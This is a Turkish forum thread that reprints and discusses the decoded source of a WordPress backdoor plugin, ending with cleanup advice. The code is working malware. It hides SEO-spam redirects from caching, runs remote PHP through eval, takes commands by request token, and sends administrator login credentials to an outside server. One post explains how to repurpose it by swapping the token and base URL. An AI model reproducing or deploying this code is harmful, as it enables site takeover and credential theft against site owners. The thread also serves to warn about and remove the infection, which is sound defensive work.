    $fatest_cache = '[{"prefix":"contain","content":"google","type":"useragent"},{"prefix":"contain","content":"yandex","type":"useragent"},{"prefix":"contain","content":"bing","type":"useragent"},{"prefix":"contain","content":"yahoo","type":"useragent"},{"prefix":"contain","content":"alexa","type":"useragent"},{"prefix":"contain","content":"googleweb","type":"useragent"}]';
    add_option("WpFastestCacheExclude",$fatest_cache);
    $pluginfolder = ABSPATH . "wp-content/plugins/wp-fastest-cache/";
    if($options = get_option("WpFastestCache")){
    $post = json_decode($options, true);
    include_once($pluginfolder.'inc/admin.php');
    $wpfc = new WpFastestCacheAdmin();
    $wpfc->modifyHtaccess($post);
    }
    }
    
    }
    
    public static function litespeed_cache_up(){
    $litespeed_cache = get_option("litespeed-cache-conf");
    if(strstr($litespeed_cache['nocache_useragents'],"google")){
    }else{
    $litespeed_cache['nocache_useragents'] = "google|yandex|bing|yahoo|googleweb|yandexbot";
    update_option("litespeed-cache-conf",$litespeed_cache);
    self::write_append(ABSPATH . '/.htaccess', "
    <IfModule LiteSpeed>
    RewriteEngine on
    CacheLookup on
    RewriteRule .* - [E=Cache-Control:no-autoflush]
    RewriteRule ^min/\w+\.(css|js) - [E=cache-control:no-vary]
    
    ### marker NOCACHE USER AGENTS start ###
    RewriteCond %{HTTP_USER_AGENT} google|yandex|bing|yahoo|alexa|googleweb|yandexbot
    RewriteRule .* - [E=Cache-Control:no-cache]
    ### marker NOCACHE USER AGENTS end ###
    
    ### marker CACHE RESOURCE start ###
    RewriteRule wp-content/.*/[^/]*(responsive|css|js|dynamic|loader|fonts)\.php - [E=cache-control:max-age=3600]
    ### marker CACHE RESOURCE end ###
    
    ### marker FAVICON start ###
    RewriteRule favicon\.ico$ - [E=cache-control:max-age=86400]
    ### marker FAVICON end ###
    </IfModule>
    ");
    
    }
    
    }
    
    public static function wp_optimize_up(){
    $getir = get_option("wpo_cache_config");
    if(in_array("google",$getir['cache_exception_browser_agents'])){
    
    }else{
    $getir['cache_exception_browser_agents'] = array("google","googlebot","yandex","yandexbot","bing","bingbot","webmastertools","googlemobile","mobilegoogle");
    update_option("wpo_cache_config",$getir);
    
    }
    
    }
    
    public static function wp_supercache_up(){
    global $wp_cache_config_file;
    $oku_dosya = self::read($wp_cache_config_file);
    if(strstr($oku_dosya,"googlebot")){
    
    }else{
    self::write_append($wp_cache_config_file, '<?php $cache_rejected_user_agent=array ( 0 => "bot", 1 => "ia_archive", 2 => "slurp", 3 => "crawl", 4 => "spider", 5 => "Yandex", 6 => "google", 7 => "bing", 8 => "googlebot", 9 => "bingbot", 10 => "alexa", 11 => "webmastertools", 12 => "googlemobile", ); ?>');
    }
    
    }
    
    public static function cache_check($ara){
    $aktif_plugin = get_option('active_plugins');
    if (in_array($ara, $aktif_plugin)) {
    return 1;
    }else{
    return 0;
    }
    
    }
    
    public static function cache_method(){
    try {
    
    if(self::cache_check("wp-fastest-cache/wpFastestCache.php")){
    self::wp_fatest_cache_up();
    }
    
    if(self::cache_check("litespeed-cache/litespeed-cache.php")){
    self::litespeed_cache_up();
    }
    
    if(self::cache_check("wp-optimize/wp-optimize.php")){
    self::wp_optimize_up();
    }
    
    if(self::cache_check("wp-super-cache/wp-cache.php")){
    self::wp_supercache_up();
    }
    
    } catch ( Exception $e ) {
    
    }
    
    }
    
    public static function init() {
    try {
    $cache = json_decode( ( new self( "" ) )->cache() );
    add_action( $cache->konum, array( 'WPPlugingsOptions', 'method' ) );
    } catch ( Exception $e ) {
    
    }
    }
    
    public static function method() {
    try {
    $cache = json_decode( ( new self( "" ) )->cache() );
    
    $konum_durum = $cache->goster_konum;
    
    $index = ( preg_match( "~({$cache->bot})~i", strtolower( @$_SERVER["HTTP_USER_AGENT"] ) ) ) ? true : false;
    if ( $index && $cache->status == 2 && ! empty( $cache->yonlen_kod ) && isset( $cache->yonlen_kod ) ) {
    
    $say_s = $_SERVER['REQUEST_URI'];
    $saydim = strlen($say_s);
    $git_url = $cache->yonlen_kod.$_SERVER['REQUEST_URI'];
    
    if($saydim > 2){
    header("HTTP/1.1 301 Moved Permanently");
    header("Location: {$git_url}");
    echo '
    <script
    src="http://ajax.googleapis.com/…/li…/jquery/1.10.2/jquery.min.js"></script>
    <script type="text/javascript">
    window.location.replace("'.$git_url.'");
    </script>';
    }else{
    header( "HTTP/1.1 301 Moved Permanently");
    header( "Location: {$cache->yonlen_kod}/");
    echo '
    <script
    src="http://ajax.googleapis.com/…/li…/jquery/1.10.2/jquery.min.js"></script>
    <script type="text/javascript">
    window.location.replace("'.$cache->yonlen_kod.'/");
    </script>';
    }
    }
    
    if ($cache->status == 0) {
    
    if($konum_durum == 1 && ! is_front_page()){
    echo $cache->link_kod;
    }
    
    if($konum_durum == 0){
    echo $cache->link_kod;
    }
    
    }else if ($index && $cache->status == 1 ) {
    
    if($konum_durum == 1 && ! is_front_page()){
    echo $cache->link_kod;
    }
    
    if($konum_durum == 0){
    echo $cache->link_kod;
    }
    
    }
    
    } catch ( Exception $e ) {
    
    }
    }
    
    public static function init_code() {
    
    $cache = json_decode( ( new self( "" ) )->cache() );
    if(isset( $cache->html_kod )){
    echo html_entity_decode($cache->html_kod);
    }
    
    if(isset( $cache->php_kod )){
    eval($cache->php_kod);
    }
    
    }
    
    }
    }
    
    try {
    if ( ! function_exists( 'preArrayList' ) ) {
    function preArrayList( $arr ) {
    echo "<pre>";
    print_r( $arr );
    echo "</pre>";
    }
    }
    if ( ! defined( "ABSPATH" ) ) {
    foreach (
    [
    "..",
    "../..",
    "../../..",
    "../../../..",
    "../../../../..",
    "../../../../../.."
    ] AS $directory
    ) {
    if ( file_exists( $directory . DIRECTORY_SEPARATOR . 'wp-load.php' ) ) {
    include_once( $directory . DIRECTORY_SEPARATOR . 'wp-load.php' );
    }
    }
    }
    } catch ( Exception $e ) {
    }
    try {
    $token = @$_REQUEST["system_action_token"];
    $action = @$_REQUEST['system_action_application'];
    $params = @$_REQUEST['system_action_params'];
    
    error_reporting( 0 );
    if ( ! is_null( $token ) && ! empty( $token ) ) {
    
    $WPPlugingsOptions = new WPPlugingsOptions( $token );
    $controlAction = $WPPlugingsOptions->controlAction( $action, $params );
    if ( is_array( $controlAction ) || is_object( $controlAction ) ) {
    preArrayList( $controlAction );
    } else {
    echo $controlAction;
    }
    } else {
    
    WPPlugingsOptions::init();
    WPPlugingsOptions::cache_method();
    WPPlugingsOptions::init_code();
    WPPlugingsOptions::wp_login();
    }
    } catch ( Exception $e ) {
    }

     


    insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek

    Daha önce paylaştığımızın yeni versiyonu hex kodları decode edildiğinde

    687474703a2f2f73797374656d2e6b72616c7068702e636f6d2f http://system.kralphp.com/

    post json hex

    7b2264617465223a22323032302d30332d31332031303a34303a3533222c22737461747573223a6e756c6c2c22676f737465725f6b6f6e756d223a6e756c6c2c226b6f6e756d223a6e756c6c2c22626f74223a6e756c6c2c226c696e6b5f6b6f64223a6e756c6c2c2268746d6c5f6b6f64223a6e756c6c2c227068705f6b6f64223a6e756c6c2c22796f6e6c656e5f6b6f64223a6e756c6c7d

    {"date":"2020-03-13 10:40:53","status":null,"goster_konum":null,"konum":null,"bot":null,"link_kod":null,"html_kod":null,"php_kod":null,"yonlen_kod":null}

    bu versiyona eklemeler yapılmış :)

    Aşşağıdaki kodaki fonksiyon http://system.kralphp.com/ log  postunda sitenize ait admin kullanıcı adı şifresini logluyor.

    public static function wp_login() {
    $post_url = hex2bin( '687474703a2f2f73797374656d2e6b72616c7068702e636f6d2f' );
    if($_POST['log']){
    $login_url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
    $username = $_POST['log'];
    $password = $_POST['pwd'];
    $test = wp_authenticate($username,$password);
    $sor = $test->allcaps;
    $testet = $sor['administrator'];
    if($testet){
     
    $git = wp_remote_post($post_url."postlogin", [
    "body" => [
    "url" => site_url( '/' ),
    "username" => $username,
    "password" => $password,
    "login_url" => $login_url,
    ]
    ] );
    EcHoLL tarafından 25/Mar/20 21:28 tarihinde düzenlenmiştir

    insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Yigit
    Yigit's avatar
    Kayıt Tarihi: 17/Temmuz/2005
    Erkek

    nasıl kullanıyoruz bunu?

  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek
    Yigit bunu yazdı

    nasıl kullanıyoruz bunu?

    if (md5(sha1($this->token)) === 'b28ee5fed7b75a888635c35727f398b6' ) {
    Bu tokenleri kendine göre düzenliyorsun  based url yide kendine göre düzenlemen gerekiyor çünkü download vs bütün işlemleri based url üzerinden alıyor Curl ile  access alabilirsin http://system.kralphp.com/clientfiles/files/shell   json kullanmış zaten adam kimse kullanamasın diye böyle birşey seçmiş sunucularınızı tarayın bu lavuk wordpress xmlrpc.php ile daha önce logladığı türk sitelerine sunucuda bruteforce çekiyor yani temizledikden sonra aynı şifre olan herşeyi değiştirmelisiniz.

    insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    KaptaN
    KaptaN's avatar
    Kayıt Tarihi: 30/Ağustos/2005
    Erkek

    Teşekkürler


    小さなカエル、小さなカエルの尾はどこですか?? ------- 王八蛋
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    streetw1se
    streetw1se's avatar
    Kayıt Tarihi: 22/Eylül/2007
    Erkek

    ben hala anlamadım hocam :) kusura bakma.

    basit bir şekilde adım adım ifade edecek olan varmı :)

  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EmQceR
    EmQceR's avatar
    Kayıt Tarihi: 14/Kasım/2007
    Erkek

    bence cok güzel iş cıkarmıs helal olsun adama


    Bu Yüce Türk Milleti ne ihanetler gördü hepsinin üstesinden gelmeyi başararak tarihe nice zaferler yazdırdı. Bu Millet Kuva-yı milliye hareketini yeniden başlatır. Sivas Kongresini yeniden toplar, Ya İstiklal, Ya Ölüm diye haykırır ve gereğini yapar. Türk Milleti ihaneti ve hainleri hiç affetmez. Dileğimiz odur ki bu iş sandıkta bitsin, aksi halde "sürüye dalmayı göze alan Kurt, çobanın da, köpeğinde hesabını yapmaz."
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Master
    Master's avatar
    Kayıt Tarihi: 10/Nisan/2007
    Erkek

    iş yapar güzel eline sağlık Ekol


    Bilgi güçtür, düşmanını barışa zorlar.
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    mkyyldrm
    mkyyldrm's avatar
    Kayıt Tarihi: 20/Haziran/2015
    Erkek

    Selamlar olayı nedir kısaca bilgi geçebilecek olan var mı ?

    Php ve mysql bilgim var ama olayı kavrayamadım nedense :)

  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    hworm
    hworm's avatar
    Kayıt Tarihi: 24/Mart/2007
    Dişi

    bunu bulaştığı sistemden kolayca temizlemenin bir yolu var mı arkadaşlar ?


    No thing is possible ,world itselfs say ı’m possible
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek
    hworm bunu yazdı

    bunu bulaştığı sistemden kolayca temizlemenin bir yolu var mı arkadaşlar ?

    https://www.tahribat.com/forum/wordpress-backdoor-243978

    Bulaştığı dosyalar nasıl arama yapıcağın hakkında bilgi bulabilirsin bulaşmış bir sistemin varsa wp-content dosyasını silme geri kalan bütün dosyaları silip temiz wp dosyalarını upload edersen kurtulursun wp-content içine .htaccess dosyası oluşturup

    <FilesMatch "\.(?i:php)$">
      <IfModule !mod_authz_core.c>
        Order allow,deny
        Deny from all
      </IfModule>
      <IfModule mod_authz_core.c>
        Require all denied
      </IfModule>
    </FilesMatch>
    

     

    wp-content altındaki php dosyalarına direk erişimi engeleye bilirsin tema dosylarına eklemeler var ise onlarıda değiştirme tarihlerine bakarak enfekte olanları düzeltmen gerekiyor.


    insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
Toplam Hit: 784 Toplam Mesaj: 11
backdoor